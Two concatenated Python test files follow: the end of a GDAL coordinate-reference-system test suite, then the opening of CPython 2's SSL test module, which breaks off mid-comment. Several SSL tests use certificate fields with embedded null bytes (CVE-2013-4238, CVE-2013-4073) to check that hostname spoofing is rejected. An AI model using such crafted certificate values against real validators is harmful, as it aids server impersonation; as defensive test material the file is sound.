UNIT["degree",0.0174532925199433]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",246.4567], PARAMETER["standard_parallel_2",46.4567], PARAMETER["latitude_of_origin",46.123], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP') assert sr2 is None # LCC_2SP -> LCC_1SP : Invalid standard_parallel_2 sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",46.4567], PARAMETER["standard_parallel_2",246.4567], PARAMETER["latitude_of_origin",46.123], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP') assert sr2 is None # LCC_2SP -> LCC_1SP : Invalid latitude_of_origin sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",46.4567], PARAMETER["standard_parallel_2",46.4567], PARAMETER["latitude_of_origin",246.123], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP') assert sr2 is None # LCC_2SP -> LCC_1SP : abs(stdp1) == abs(stdp2) sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",1], PARAMETER["standard_parallel_2",-1], PARAMETER["latitude_of_origin",10], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP') assert sr2 is None # LCC_2SP -> LCC_1SP : stdp1 ~= stdp2 ~= 0 sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",.0000000000000001], PARAMETER["standard_parallel_2",.0000000000000002], PARAMETER["latitude_of_origin",10], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP') assert sr2 is None # LCC_2SP -> LCC_1SP : Invalid eccentricity sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,0.1]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",46.4567], PARAMETER["standard_parallel_2",46.4567], PARAMETER["latitude_of_origin",46.123], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP') assert sr2 is None ############################################################################### # Test corner cases of osr.SetGeocCS() def test_osr_basic_setgeogcs(): sr = osr.SpatialReference() sr.SetGeogCS(None, None, None, 0, 0, None, 0, None, 0) assert sr.ExportToWkt() == 'GEOGCS["unnamed",DATUM["unnamed",SPHEROID["unnamed",0,0]],PRIMEM["Reference meridian",0],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST]]' sr.SetGeogCS('a', 'b', 'c', 1, 2, 'd', 3, 'e', 4) assert sr.ExportToWkt() == 'GEOGCS["a",DATUM["b",SPHEROID["c",1,2]],PRIMEM["d",3],UNIT["e",4],AXIS["Latitude",NORTH],AXIS["Longitude",EAST]]' sr.SetUTM(31) sr.SetGeogCS(None, None, None, 0, 0, None, 0, None, 0) assert sr.ExportToWkt() == 'PROJCS["unnamed",GEOGCS["unnamed",DATUM["unnamed",SPHEROID["unnamed",0,0]],PRIMEM["Reference meridian",0],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",3],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH]]' ############################################################################### # Test other authorities than EPSG, e.g. IGNF:XXXX # def test_osr_basic_set_from_user_input_IGNF(): srs = osr.SpatialReference() assert srs.SetFromUserInput("IGNF:LAMB93") == 0 assert srs.GetAuthorityName(None) == 'IGNF' and srs.GetAuthorityCode(None) == 'LAMB93' def test_osr_basic_set_from_user_input_IGNF_non_existing_code(): srs = osr.SpatialReference() assert srs.SetFromUserInput("IGNF:non_existing_code") != 0 def test_osr_basic_set_from_user_input_non_existing_authority(): srs = osr.SpatialReference() assert srs.SetFromUserInput("non_existing_auth:1234") != 0 def test_osr_basic_set_from_user_input_GEODCRS(): srs = osr.SpatialReference() assert srs.SetFromUserInput("""GEODCRS["WGS 84", DATUM["World Geodetic System 1984", ELLIPSOID["WGS 84",6378137,298.257223563, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]], CS[ellipsoidal,2], AXIS["geodetic latitude (Lat)",north, ORDER[1], ANGLEUNIT["degree",0.0174532925199433]], AXIS["geodetic longitude (Lon)",east, ORDER[2], ANGLEUNIT["degree",0.0174532925199433]], AREA["World"], BBOX[-90,-180,90,180], ID["EPSG",4326]]""") == 0 assert srs.Validate() == 0 def test_osr_basic_set_from_user_input_GEOGCRS(): srs = osr.SpatialReference() assert srs.SetFromUserInput("""GEOGCRS["WGS 84", DATUM["World Geodetic System 1984", ELLIPSOID["WGS 84",6378137,298.257223563, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]], CS[ellipsoidal,2], AXIS["geodetic latitude (Lat)",north, ORDER[1], ANGLEUNIT["degree",0.0174532925199433]], AXIS["geodetic longitude (Lon)",east, ORDER[2], ANGLEUNIT["degree",0.0174532925199433]], USAGE[ SCOPE["unknown"], AREA["World"], BBOX[-90,-180,90,180]], ID["EPSG",4326]]""") == 0 assert srs.Validate() == 0 def test_osr_basic_set_from_user_input_PROJCRS(): srs = osr.SpatialReference() assert srs.SetFromUserInput("""PROJCRS["WGS 84 / UTM zone 31N", BASEGEODCRS["WGS 84", DATUM["World Geodetic System 1984", ELLIPSOID["WGS 84",6378137,298.257223563, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]]], CONVERSION["UTM zone 31N", METHOD["Transverse Mercator", ID["EPSG",9807]], PARAMETER["Latitude of natural origin",0, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8801]], PARAMETER["Longitude of natural origin",3, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8802]], PARAMETER["Scale factor at natural origin",0.9996, SCALEUNIT["unity",1], ID["EPSG",8805]], PARAMETER["False easting",500000, LENGTHUNIT["metre",1], ID["EPSG",8806]], PARAMETER["False northing",0, LENGTHUNIT["metre",1], ID["EPSG",8807]]], CS[Cartesian,2], AXIS["(E)",east, ORDER[1], LENGTHUNIT["metre",1]], AXIS["(N)",north, ORDER[2], LENGTHUNIT["metre",1]], AREA["World - N hemisphere - 0°E to 6°E - by country"], BBOX[0,0,84,6], ID["EPSG",32631]]""") == 0 assert srs.Validate() == 0 def test_osr_basic_set_from_user_input_COMPOUNDCRS(): srs = osr.SpatialReference() assert srs.SetFromUserInput("""COMPOUNDCRS["KKJ / Finland Uniform Coordinate System + N60 height", PROJCRS["KKJ / Finland Uniform Coordinate System", BASEGEODCRS["KKJ", DATUM["Kartastokoordinaattijarjestelma (1966)", ELLIPSOID["International 1924",6378388,297, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]]], CONVERSION["Finland Uniform Coordinate System", METHOD["Transverse Mercator", ID["EPSG",9807]], PARAMETER["Latitude of natural origin",0, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8801]], PARAMETER["Longitude of natural origin",27, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8802]], PARAMETER["Scale factor at natural origin",1, SCALEUNIT["unity",1], ID["EPSG",8805]], PARAMETER["False easting",3500000, LENGTHUNIT["metre",1], ID["EPSG",8806]], PARAMETER["False northing",0, LENGTHUNIT["metre",1], ID["EPSG",8807]]], CS[Cartesian,2], AXIS["northing (X)",north, ORDER[1], LENGTHUNIT["metre",1]], AXIS["easting (Y)",east, ORDER[2], LENGTHUNIT["metre",1]]], VERTCRS["N60 height", VDATUM["Helsinki 1960"], CS[vertical,1], AXIS["gravity-related height (H)",up, LENGTHUNIT["metre",1]]], AREA["Finland - onshore"], BBOX[59.75,19.24,70.09,31.59], ID["EPSG",3901]]""") == 0 assert srs.Validate() == 0 def test_osr_basic_export_to_sfsql(): sr = osr.SpatialReference() sr.SetWellKnownGeogCS('WGS84') assert sr.ExportToWkt(['FORMAT=SFSQL']) == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433]]' def test_osr_basic_export_to_wkt1_esri(): sr = osr.SpatialReference() sr.SetWellKnownGeogCS('WGS84') assert sr.ExportToWkt(['FORMAT=WKT1_ESRI']) == 'GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137.0,298.257223563]],PRIMEM["Greenwich",0.0],UNIT["Degree",0.0174532925199433]]' def test_osr_basic_export_to_wkt1_gdal(): sr = osr.SpatialReference() sr.SetWellKnownGeogCS('WGS84') assert sr.ExportToWkt(['FORMAT=WKT1_GDAL']) == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]' def test_osr_basic_export_to_wkt2_2015(): sr = osr.SpatialReference() sr.SetWellKnownGeogCS('WGS84') assert sr.ExportToWkt(['FORMAT=WKT2_2015']) == 'GEODCRS["WGS 84",DATUM["World Geodetic System 1984",ELLIPSOID["WGS 84",6378137,298.257223563,LENGTHUNIT["metre",1]]],PRIMEM["Greenwich",0,ANGLEUNIT["degree",0.0174532925199433]],CS[ellipsoidal,2],AXIS["geodetic latitude (Lat)",north,ORDER[1],ANGLEUNIT["degree",0.0174532925199433]],AXIS["geodetic longitude (Lon)",east,ORDER[2],ANGLEUNIT["degree",0.0174532925199433]],ID["EPSG",4326]]' def test_osr_basic_export_to_wkt2_2018(): sr = osr.SpatialReference() sr.SetWellKnownGeogCS('WGS84') assert sr.ExportToWkt(['FORMAT=WKT2_2018']) == 'GEOGCRS["WGS 84",DATUM["World Geodetic System 1984",ELLIPSOID["WGS 84",6378137,298.257223563,LENGTHUNIT["metre",1]]],PRIMEM["Greenwich",0,ANGLEUNIT["degree",0.0174532925199433]],CS[ellipsoidal,2],AXIS["geodetic latitude (Lat)",north,ORDER[1],ANGLEUNIT["degree",0.0174532925199433]],AXIS["geodetic longitude (Lon)",east,ORDER[2],ANGLEUNIT["degree",0.0174532925199433]],ID["EPSG",4326]]' def test_osr_get_name(): sr = osr.SpatialReference() assert sr.GetName() is None sr.SetWellKnownGeogCS('WGS84') assert sr.GetName() == 'WGS 84' def test_SetPROJSearchPath(): # OSRSetPROJSearchPaths() is only taken into priority over other methods # starting with PROJ >= 6.1 if not(osr.GetPROJVersionMajor() > 6 or osr.GetPROJVersionMinor() >= 1): pytest.skip() # Do the test in a new thread, so that SetPROJSearchPath() is taken # into account def threaded_function(arg): sr = osr.SpatialReference() with gdaltest.error_handler(): arg[0] = sr.ImportFromEPSG(32631) try: arg = [ -1 ] thread = Thread(target = threaded_function, args = (arg, )) thread.start() thread.join() assert arg[0] == 0 osr.SetPROJSearchPath('/i_do/not/exist') thread = Thread(target = threaded_function, args = (arg, )) thread.start() thread.join() assert arg[0] > 0 finally: # Cancel search path (we can't call SetPROJSearchPath(None)) osr.SetPROJSearchPaths([]) sr = osr.SpatialReference() assert sr.ImportFromEPSG(32631) == 0 def test_osr_import_projjson(): sr = osr.SpatialReference() projjson = '{"$schema":"https://proj.org/schemas/v0.1/projjson.schema.json","type":"GeographicCRS","name":"WGS 84","datum":{"type":"GeodeticReferenceFrame","name":"World Geodetic System 1984","ellipsoid":{"name":"WGS 84","semi_major_axis":6378137,"inverse_flattening":298.257223563}},"coordinate_system":{"subtype":"ellipsoidal","axis":[{"name":"Geodetic latitude","abbreviation":"Lat","direction":"north","unit":"degree"},{"name":"Geodetic longitude","abbreviation":"Lon","direction":"east","unit":"degree"}]},"area":"World","bbox":{"south_latitude":-90,"west_longitude":-180,"north_latitude":90,"east_longitude":180},"id":{"authority":"EPSG","code":4326}}' with gdaltest.error_handler(): ret = sr.SetFromUserInput(projjson) if osr.GetPROJVersionMajor() > 6 or osr.GetPROJVersionMinor() >= 2: assert ret == 0 broken_projjson = projjson[0:-10] with gdaltest.error_handler(): assert sr.SetFromUserInput(broken_projjson) != 0 def test_osr_export_projjson(): sr = osr.SpatialReference() sr.SetFromUserInput('WGS84') if not(osr.GetPROJVersionMajor() > 6 or osr.GetPROJVersionMinor() >= 2): with gdaltest.error_handler(): sr.ExportToPROJJSON() pytest.skip() assert sr.ExportToPROJJSON() != '' def test_osr_promote_to_3D(): sr = osr.SpatialReference() sr.SetFromUserInput('WGS84') if osr.GetPROJVersionMajor() < 7: with gdaltest.error_handler(): sr.PromoteTo3D() pytest.skip() assert sr.PromoteTo3D() == 0 assert sr.GetAuthorityCode(None) == '4979'
test_ssl.py
# -*- coding: utf-8 -*- # Test the support for SSL and sockets import sys import unittest from test import test_support as support import asyncore import socket import select import time import datetime import gc import os import errno import pprint import tempfile import urllib2 import traceback import weakref import platform import functools from contextlib import closing ssl = support.import_module("ssl") PROTOCOLS = sorted(ssl._PROTOCOL_NAMES) HOST = support.HOST def data_file(*name): return os.path.join(os.path.dirname(__file__), *name) # The custom key and certificate files used in test_ssl are generated # using Lib/test/make_ssl_certs.py. # Other certificates are simply fetched from the Internet servers they # are meant to authenticate. CERTFILE = data_file("keycert.pem") BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding()) ONLYCERT = data_file("ssl_cert.pem") ONLYKEY = data_file("ssl_key.pem") BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding()) BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding()) CERTFILE_PROTECTED = data_file("keycert.passwd.pem") ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem") KEY_PASSWORD = "somepass" CAPATH = data_file("capath") BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding()) CAFILE_NEURONIO = data_file("capath", "4e1295a3.0") CAFILE_CACERT = data_file("capath", "5ed36f99.0") # empty CRL CRLFILE = data_file("revocation.crl") # Two keys and certs signed by the same CA (for SNI tests) SIGNED_CERTFILE = data_file("keycert3.pem") SIGNED_CERTFILE2 = data_file("keycert4.pem") SIGNING_CA = data_file("pycacert.pem") REMOTE_HOST = "self-signed.pythontest.net" REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem") EMPTYCERT = data_file("nullcert.pem") BADCERT = data_file("badcert.pem") WRONGCERT = data_file("XXXnonexisting.pem") BADKEY = data_file("badkey.pem") NOKIACERT = data_file("nokia.pem") NULLBYTECERT = data_file("nullbytecert.pem") DHFILE = data_file("dh1024.pem") BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding()) def handle_error(prefix): exc_format = ' '.join(traceback.format_exception(*sys.exc_info())) if support.verbose: sys.stdout.write(prefix + exc_format) class BasicTests(unittest.TestCase): def test_sslwrap_simple(self): # A crude test for the legacy API try: ssl.sslwrap_simple(socket.socket(socket.AF_INET)) except IOError, e: if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that pass else: raise try: ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock) except IOError, e: if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that pass else: raise def can_clear_options(): # 0.9.8m or higher return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15) def no_sslv2_implies_sslv3_hello(): # 0.9.7h or higher return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15) def have_verify_flags(): # 0.9.8 or higher return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15) def utc_offset(): #NOTE: ignore issues like #1647654 # local time = utc time + utc offset if time.daylight and time.localtime().tm_isdst > 0: return -time.altzone # seconds return -time.timezone def asn1time(cert_time): # Some versions of OpenSSL ignore seconds, see #18207 # 0.9.8.i if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15): fmt = "%b %d %H:%M:%S %Y GMT" dt = datetime.datetime.strptime(cert_time, fmt) dt = dt.replace(second=0) cert_time = dt.strftime(fmt) # %d adds leading zero but ASN1_TIME_print() uses leading space if cert_time[4] == "0": cert_time = cert_time[:4] + " " + cert_time[5:] return cert_time # Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2 def skip_if_broken_ubuntu_ssl(func): if hasattr(ssl, 'PROTOCOL_SSLv2'): @functools.wraps(func) def f(*args, **kwargs): try: ssl.SSLContext(ssl.PROTOCOL_SSLv2) except ssl.SSLError: if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and platform.linux_distribution() == ('debian', 'squeeze/sid', '')): raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour") return func(*args, **kwargs) return f else: return func needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test") class BasicSocketTests(unittest.TestCase): def test_constants(self): ssl.CERT_NONE ssl.CERT_OPTIONAL ssl.CERT_REQUIRED ssl.OP_CIPHER_SERVER_PREFERENCE ssl.OP_SINGLE_DH_USE if ssl.HAS_ECDH: ssl.OP_SINGLE_ECDH_USE if ssl.OPENSSL_VERSION_INFO >= (1, 0): ssl.OP_NO_COMPRESSION self.assertIn(ssl.HAS_SNI, {True, False}) self.assertIn(ssl.HAS_ECDH, {True, False}) def test_random(self): v = ssl.RAND_status() if support.verbose: sys.stdout.write("\n RAND_status is %d (%s)\n" % (v, (v and "sufficient randomness") or "insufficient randomness")) if hasattr(ssl, 'RAND_egd'): self.assertRaises(TypeError, ssl.RAND_egd, 1) self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1) ssl.RAND_add("this is a random string", 75.0) def test_parse_cert(self): # note that this uses an 'unofficial' function in _ssl.c, # provided solely for this test, to exercise the certificate # parsing code p = ssl._ssl._test_decode_cert(CERTFILE) if support.verbose: sys.stdout.write("\n" + pprint.pformat(p) + "\n") self.assertEqual(p['issuer'], ((('countryName', 'XY'),), (('localityName', 'Castle Anthrax'),), (('organizationName', 'Python Software Foundation'),), (('commonName', 'localhost'),)) ) # Note the next three asserts will fail if the keys are regenerated self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT')) self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT')) self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E') self.assertEqual(p['subject'], ((('countryName', 'XY'),), (('localityName', 'Castle Anthrax'),), (('organizationName', 'Python Software Foundation'),), (('commonName', 'localhost'),)) ) self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),)) # Issue #13034: the subjectAltName in some certificates # (notably projects.developer.nokia.com:443) wasn't parsed p = ssl._ssl._test_decode_cert(NOKIACERT) if support.verbose: sys.stdout.write("\n" + pprint.pformat(p) + "\n") self.assertEqual(p['subjectAltName'], (('DNS', 'projects.developer.nokia.com'), ('DNS', 'projects.forum.nokia.com')) ) # extra OCSP and AIA fields self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',)) self.assertEqual(p['caIssuers'], ('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',)) self.assertEqual(p['crlDistributionPoints'], ('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',)) def test_parse_cert_CVE_2013_4238(self): p = ssl._ssl._test_decode_cert(NULLBYTECERT) if support.verbose: sys.stdout.write("\n" + pprint.pformat(p) + "\n") subject = ((('countryName', 'US'),), (('stateOrProvinceName', 'Oregon'),), (('localityName', 'Beaverton'),), (('organizationName', 'Python Software Foundation'),), (('organizationalUnitName', 'Python Core Development'),), (('commonName', 'null.python.org\x00example.org'),), (('emailAddress', 'python-dev@python.org'),)) self.assertEqual(p['subject'], subject) self.assertEqual(p['issuer'], subject) if ssl._OPENSSL_API_VERSION >= (0, 9, 8): san = (('DNS', 'altnull.python.org\x00example.com'), ('email', 'null@python.org\x00user@example.org'), ('URI', 'http://null.python.org\x00http://example.org'), ('IP Address', '192.0.2.1'), ('IP Address', '2001:DB8:0:0:0:0:0:1\n')) else: # OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName san = (('DNS', 'altnull.python.org\x00example.com'), ('email', 'null@python.org\x00user@example.org'), ('URI', 'http://null.python.org\x00http://example.org'), ('IP Address', '192.0.2.1'), ('IP Address', '<invalid>')) self.assertEqual(p['subjectAltName'], san) def test_DER_to_PEM(self): with open(CAFILE_CACERT, 'r') as f: pem = f.read() d1 = ssl.PEM_cert_to_DER_cert(pem) p2 = ssl.DER_cert_to_PEM_cert(d1) d2 = ssl.PEM_cert_to_DER_cert(p2) self.assertEqual(d1, d2) if not p2.startswith(ssl.PEM_HEADER + '\n'): self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2) if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'): self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2) def test_openssl_version(self): n = ssl.OPENSSL_VERSION_NUMBER t = ssl.OPENSSL_VERSION_INFO s = ssl.OPENSSL_VERSION self.assertIsInstance(n, (int, long)) self.assertIsInstance(t, tuple) self.assertIsInstance(s, str) # Some sanity checks follow # >= 0.9 self.assertGreaterEqual(n, 0x900000) # < 3.0 self.assertLess(n, 0x30000000) major, minor, fix, patch, status = t self.assertGreaterEqual(major, 0) self.assertLess(major, 3) self.assertGreaterEqual(minor, 0) self.assertLess(minor, 256) self.assertGreaterEqual(fix, 0) self.assertLess(fix, 256) self.assertGreaterEqual(patch, 0) self.assertLessEqual(patch, 63) self.assertGreaterEqual(status, 0) self.assertLessEqual(status, 15) # Version string as returned by {Open,Libre}SSL, the format might change if "LibreSSL" in s: self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)), (s, t)) else: self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)), (s, t)) @support.cpython_only def test_refcycle(self): # Issue #7943: an SSL object doesn't create reference cycles with # itself. s = socket.socket(socket.AF_INET) ss = ssl.wrap_socket(s) wr = weakref.ref(ss) del ss self.assertEqual(wr(), None) def test_wrapped_unconnected(self): # Methods on an unconnected SSLSocket propagate the original # socket.error raise by the underlying socket object. s = socket.socket(socket.AF_INET) with closing(ssl.wrap_socket(s)) as ss: self.assertRaises(socket.error, ss.recv, 1) self.assertRaises(socket.error, ss.recv_into, bytearray(b'x')) self.assertRaises(socket.error, ss.recvfrom, 1) self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1) self.assertRaises(socket.error, ss.send, b'x') self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0)) def test_timeout(self): # Issue #8524: when creating an SSL socket, the timeout of the # original socket should be retained. for timeout in (None, 0.0, 5.0): s = socket.socket(socket.AF_INET) s.settimeout(timeout) with closing(ssl.wrap_socket(s)) as ss: self.assertEqual(timeout, ss.gettimeout()) def test_errors(self): sock = socket.socket() self.assertRaisesRegexp(ValueError, "certfile must be specified", ssl.wrap_socket, sock, keyfile=CERTFILE) self.assertRaisesRegexp(ValueError, "certfile must be specified for server-side operations", ssl.wrap_socket, sock, server_side=True) self.assertRaisesRegexp(ValueError, "certfile must be specified for server-side operations", ssl.wrap_socket, sock, server_side=True, certfile="") with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s: self.assertRaisesRegexp(ValueError, "can't connect in server-side mode", s.connect, (HOST, 8080)) with self.assertRaises(IOError) as cm: with closing(socket.socket()) as sock: ssl.wrap_socket(sock, certfile=WRONGCERT) self.assertEqual(cm.exception.errno, errno.ENOENT) with self.assertRaises(IOError) as cm: with closing(socket.socket()) as sock: ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT) self.assertEqual(cm.exception.errno, errno.ENOENT) with self.assertRaises(IOError) as cm: with closing(socket.socket()) as sock: ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT) self.assertEqual(cm.exception.errno, errno.ENOENT) def test_match_hostname(self): def ok(cert, hostname): ssl.match_hostname(cert, hostname) def fail(cert, hostname): self.assertRaises(ssl.CertificateError, ssl.match_hostname, cert, hostname) cert = {'subject': ((('commonName', 'example.com'),),)} ok(cert, 'example.com') ok(cert, 'ExAmple.cOm') fail(cert, 'www.example.com') fail(cert, '.example.com') fail(cert, 'example.org') fail(cert, 'exampleXcom') cert = {'subject': ((('commonName', '*.a.com'),),)} ok(cert, 'foo.a.com') fail(cert, 'bar.foo.a.com') fail(cert, 'a.com') fail(cert, 'Xa.com') fail(cert, '.a.com') # only match one left-most wildcard cert = {'subject': ((('commonName', 'f*.com'),),)} ok(cert, 'foo.com') ok(cert, 'f.com') fail(cert, 'bar.com') fail(cert, 'foo.a.com') fail(cert, 'bar.foo.com') # NULL bytes are bad, CVE-2013-4073 cert = {'subject': ((('commonName', 'null.python.org\x00example.org'),),)} ok(cert, 'null.python.org\x00example.org') # or raise an error? fail(cert, 'example.org') fail(cert, 'null.python.org') # error cases with wildcards cert = {'subject': ((('commonName', '*.*.a.com'),),)} fail(cert, 'bar.foo.a.com') fail(cert, 'a.com') fail(cert, 'Xa.com') fail(cert, '.a.com') cert = {'subject': ((('commonName', 'a.*.com'),),)} fail(cert, 'a.foo.com') fail(cert, 'a..com') fail(cert, 'a.com') # wildcard doesn't match IDNA prefix 'xn--' idna = u'püthon.python.org'.encode("idna").decode("ascii") cert = {'subject': ((('commonName', idna),),)} ok(cert, idna) cert = {'subject': ((('commonName', 'x*.python.org'),),)} fail(cert, idna) cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)} fail(cert, idna) # wildcard in first fragment and IDNA A-labels in sequent fragments # are supported. idna = u'www*.pythön.org'.encode("idna").decode("ascii") cert = {'subject': ((('commonName', idna),),)} ok(cert, u'www.pythön.org'.encode("idna").decode("ascii")) ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii")) fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii")) fail(cert, u'pythön.org'.encode("idna").decode("ascii")) # Slightly fake real-world example cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT', 'subject': ((('commonName', 'linuxfrz.org'),),), 'subjectAltName': (('DNS', 'linuxfr.org'), ('DNS', 'linuxfr.com'), ('othername', '<unsupported>'))} ok(cert, 'linuxfr.org') ok(cert, 'linuxfr.com') # Not a "DNS" entry fail(cert, '<unsupported>') # When there is a subjectAltName, commonName isn't used fail(cert, 'linuxfrz.org') # A pristine real-world example cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT', 'subject': ((('countryName', 'US'),), (('stateOrProvinceName', 'California'),), (('localityName', 'Mountain View'),), (('organizationName', 'Google Inc'),), (('commonName', 'mail.google.com'),))} ok(cert, 'mail.google.com') fail(cert, 'gmail.com') # Only commonName is considered fail(cert, 'California') # Neither commonName nor subjectAltName cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT', 'subject': ((('countryName', 'US'),), (('stateOrProvinceName', 'California'),), (('localityName', 'Mountain View'),), (('organizationName', 'Google Inc'),))} fail(cert, 'mail.google.com') # No DNS entry in subjectAltName but a commonName cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT', 'subject': ((('countryName', 'US'),), (('stateOrProvinceName', 'California'),), (('localityName', 'Mountain View'),), (('commonName', 'mail.google.com'),)), 'subjectAltName': (('othername', 'blabla'), )} ok(cert, 'mail.google.com') # No DNS entry subjectAltName and no 